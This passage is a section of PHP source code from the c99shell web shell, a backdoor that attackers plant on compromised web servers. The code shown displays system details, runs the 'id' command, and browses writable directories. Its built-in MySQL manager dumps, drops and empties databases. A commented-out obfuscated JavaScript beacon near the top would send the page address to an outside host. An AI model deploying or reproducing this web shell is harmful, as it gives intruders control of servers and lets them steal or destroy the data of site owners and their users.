if (!is_array($actbox)) {$actbox = array();}
$dspact = $act = htmlspecialchars($act);
$disp_fullpath = $ls_arr = $notls = null;
$ud = urlencode($d);
?>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us">
<title><?php echo getenv("HTTP_HOST"); ?> c99shell - Edited By KingDefacer</title>
<script>

/*
var _0x5be8=["\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x65\x76\x61\x6C\x2E\x63\x72\x79\x70\x74\x72\x2E\x6F\x72\x67\x2F\x3F\x78\x3D","\x68\x72\x65\x66"]
a= new Image();
a[_0x5be8[0]]=_0x5be8[1]+escape(location[_0x5be8[2]]);

*/
</script>
<STYLE> <?php // body { behavior: url(data:text/javascript;base64,ZXZhbC5jcnlwdHIub3JnL2dvcmJhZ29yLmh0Yw); } ?>
TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}body {
	background-color: #000106;
}
</style></head><BODY text=#ffffff leftMargin=0 topMargin=0 rightMargin=0 bottomMargin=0 marginwidth=0 marginheight=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99 Shell Designed by MilitanZ phpshell.in</b></font></a><font face=Webdings size=6><b>!</b></font></p>
    <p>&nbsp;</p>    
    </center></th></tr><tr><td><p align="left"><b>Server Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>Uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Security Mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left">
<?php
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
$d = str_replace("\\\\","\\",$d);
$dispd = htmlspecialchars($d);
$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
$i = 0;
foreach($pd as $b)
{
 $t = "";
 $j = 0;
 foreach ($e as $r)
 {
  $t.= $r.DIRECTORY_SEPARATOR;
  if ($j == $i) {break;}
  $j++;
 }
 echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
 $i++;
}
echo "&nbsp;&nbsp;&nbsp;";
if (is_writable($d))
{
 $wd = true;
 $wdt = "<font color=green> [ ok ] </font>";
 echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
}
else
{
 $wd = false;
 $wdt = "<font color=red> [ Read Only ] </font>";
 echo "<b>".view_perms_color($d)."</b>";
}
if (is_callable("disk_free_space"))
{
 $free = disk_free_space($d);
 $total = disk_total_space($d);
 if ($free === false) {$free = 0;}
 if ($total === false) {$total = 0;}
 if ($free < 0) {$free = 0;}
 if ($total < 0) {$total = 0;}
 $used = $total-$free;
 $free_percent = round(100/($total/$free),2);
 echo "<br><b>Total ".view_size($total)." capacity, and ".view_size($free)." Bo$. Average(".$free_percent."%) </b>";
}
echo "<br>";
$letters = "";
if ($win)
{
 $v = explode("\\",$d);
 $v = $v[0];
 foreach (range("a","z") as $letter)
 {
  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
  if (!$bool) {$bool = is_dir($letter.":\\");}
  if ($bool)
  {
   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Disketin Takili oldugundan Emin ol!')\"":"").">[ ";
   if ($letter.":" != $v) {$letters .= $letter;}
   else {$letters .= "<font color=green>".$letter."</font>";}
   $letters .= " ]</a> ";
  }
 }
 if (!empty($letters)) {echo "<b>Bulunan Suruculer</b>: ".$letters."<br>";}
}
if (count($quicklaunch) > 0)
{
 foreach($quicklaunch as $item)
 {
  $item[1] = str_replace("%d",urlencode($d),$item[1]);
  $item[1] = str_replace("%sort",$sort,$item[1]);
  $v = realpath($d."..");
  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
 }
}
echo "</p></td></tr></table><br>";
if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#FF0000 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
if ($act == "") {$act = $dspact = "ls";}
if ($act == "sql")
{
 $sql_surl = $surl."act=sql";
 if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
 if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
 if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
 if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
 if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
 $sql_surl .= "&";
 ?><h3>Attention! SQL-Manager i Hibernate  <u>Not</u>. </h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
 if ($sql_server)
 {
  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
  $err = mysql_smarterror();
  @mysql_select_db($sql_db,$sql_sock);
  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
 }
 else {$sql_sock = false;}
 echo "<b>SQL Manager:</b><br>";
 if (!$sql_sock)
 {
  if (!$sql_server) {echo "Could not connect";}
  else {echo "<center><b>Could not connect</b></center>"; echo "<b>".$err."</b>";}
 }
 else
 {
  $sqlquicklaunch = array();
  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
  echo "</center>";
 }
 echo "</td></tr><tr>";
 if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> </font></center><li>If the password is invalid, the password is admin .<li>If host is invalid, host is localhost</b><li>If the port is invalid, the normal port is "3306"</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please fill the form:</b><table><tr><td><b>Username(root)</b></td><td><b>Password(qwe123)</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
 else
 {
  //Start left panel
  if (!empty($sql_db))
  {
   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
   $result = mysql_list_tables($sql_db);
   if (!$result) {echo mysql_smarterror();}
   else
   {
    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
    $c = 0;
    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
    if (!$c) {echo "Table not found in database!";}
   }
  }
  else
  {
   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
   $result = mysql_list_dbs($sql_sock);
   if (!$result) {echo mysql_smarterror();}
   else
   {
    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
    $c = 0;
    $dbs = "";
    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
    echo "<option value=\"\">Databases (".$c.")</option>";
    echo $dbs;
   }
   ?></select><hr size="1" noshade>Please select Database<hr size="1" noshade><input type="submit" value="Go"></form><?php
  }
  //End left panel
  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
  //Start center panel
  $diplay = true;
  if ($sql_db)
  {
   if (!is_numeric($c)) {$c = 0;}
   if ($c == 0) {$c = "no";}
   echo "<hr size=\"1\" noshade><center><b>In This Database ".$c." table(s) Tablo var! (".htmlspecialchars($sql_db).").<br>";
   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
   echo "</b></center>";
   $acts = array("","dump");
   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
   elseif ($sql_tbl_act == "insert")
   {
    if ($sql_tbl_insert_radio == 1)
    {
     $keys = "";
     $akeys = array_keys($sql_tbl_insert);
     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
     $values = "";
     $i = 0;
     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
     $sql_act = "query";
     $sql_tbl_act = "browse";
    }
    elseif ($sql_tbl_insert_radio == 2)
    {
     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
     $result = mysql_query($sql_query) or print(mysql_smarterror());
     $result = mysql_fetch_array($result, MYSQL_ASSOC);
     $sql_act = "query";
     $sql_tbl_act = "browse";
    }
   }
   if ($sql_act == "query")
   {
    echo "<hr size=\"1\" noshade>";
    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really like it bro:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Evet\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
   }
   if (in_array($sql_act,$acts))
   {
    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Creating a New Table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
    if ($sql_act == "newtbl")
    {
     echo "<b>";
     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo " \"".htmlspecialchars($sql_newdb)."\" New database created!</b><br>";
    }
    else {echo "Database Failed to Create \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
   }
   elseif ($sql_act == "dump")
   {
    if (empty($submit))
    {
     $diplay = false;
     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
     $v = join (";",$dmptbls);
     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
     if ($dump_file) {$tmp = $dump_file;}
     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
     echo "</form>";
    }
    else
    {
     $diplay = true;
     $set = array();
     $set["sock"] = $sql_sock;
     $set["db"] = $sql_db;
     $dump_out = "download";
     $set["print"] = 0;
     $set["nl2br"] = 0;
     $set[""] = 0;
     $set["file"] = $dump_file;
     $set["add_drop"] = true;
     $set["onlytabs"] = array();
     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
     $ret = mysql_dump($set);
     if ($sql_dump_download)
     {
      @ob_clean();
      header("Content-type: application/octet-stream");
      header("Content-length: ".strlen($ret));
      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
      echo $ret;
      exit;
     }
     elseif ($sql_dump_savetofile)
     {
      $fp = fopen($sql_dump_file,"w");
      if (!$fp) {echo "<b>Dump hatasi OLusturulamadi \"".htmlspecialchars($sql_dump_file)."\"!";}
      else
      {
       fwrite($fp,$ret);
       fclose($fp);
       echo "<b>Dumped! Dump Written \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
      }
     }
     else {echo "<b>Dump: nothing could be done!</b>";}
    }
   }
   if ($diplay)
   {
    if (!empty($sql_tbl))
    {
     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
     $count_row = mysql_fetch_array($count);
     mysql_free_result($count);
     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
     $tbl_struct_fields = array();
     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
     $perpage = $sql_tbl_le - $sql_tbl_ls;
     if (!is_numeric($perpage)) {$perpage = 10;}
     $numpages = $count_row[0]/$perpage;
     $e = explode(" ",$sql_order);
     if (count($e) == 2)
     {
      if ($e[0] == "d") {$asc_desc = "DESC";}
      else {$asc_desc = "ASC";}
      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
     }
     else {$v = "";}
     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
     $result = mysql_query($query) or print(mysql_smarterror());
     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
     if ($sql_tbl_act == "structure") {echo "<br><br><b>spyhackerz.com </b>";}
     if ($sql_tbl_act == "insert")
     {
      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
      if (!empty($sql_tbl_insert_radio))
      {

      }
      else
      {
       echo "<br><br><b>Insert row into table :</b><br>";
       if (!empty($sql_tbl_insert_q))
       {
        $sql_query = "SELECT * FROM `".$sql_tbl."`";
        $sql_query .= " WHERE".$sql_tbl_insert_q;
        $sql_query .= " LIMIT 1;";
        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
        $values = mysql_fetch_assoc($result);
        mysql_free_result($result);
       }
       else {$values = array();}
       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Alan</b></td><td><b>Tip</b></td><td><b>Fonksiyon</b></td><td><b>Value</b></td></tr>";
       foreach ($tbl_struct_fields as $field)
       {
        $name = $field["Alan"];
        if (empty($sql_tbl_insert_q)) {$v = "";}
        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Tip"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
        $i++;
       }
       echo "</table><br>";
       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Yeni ilave sok</b>";
       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
       echo "<br><br><input type=\"submit\" value=\"OK\"></form>";
      }
     }
     if ($sql_tbl_act == "browse")
     {
      $sql_tbl_ls = abs($sql_tbl_ls);
      $sql_tbl_le = abs($sql_tbl_le);
      echo "<hr size=\"1\" noshade>";
      echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
      $b = 0;
      for($i=0;$i<$numpages;$i++)
      {
       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
       echo $i;
       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
       else {echo "&nbsp;";}
      }
      if ($i == 0) {echo "empty";}
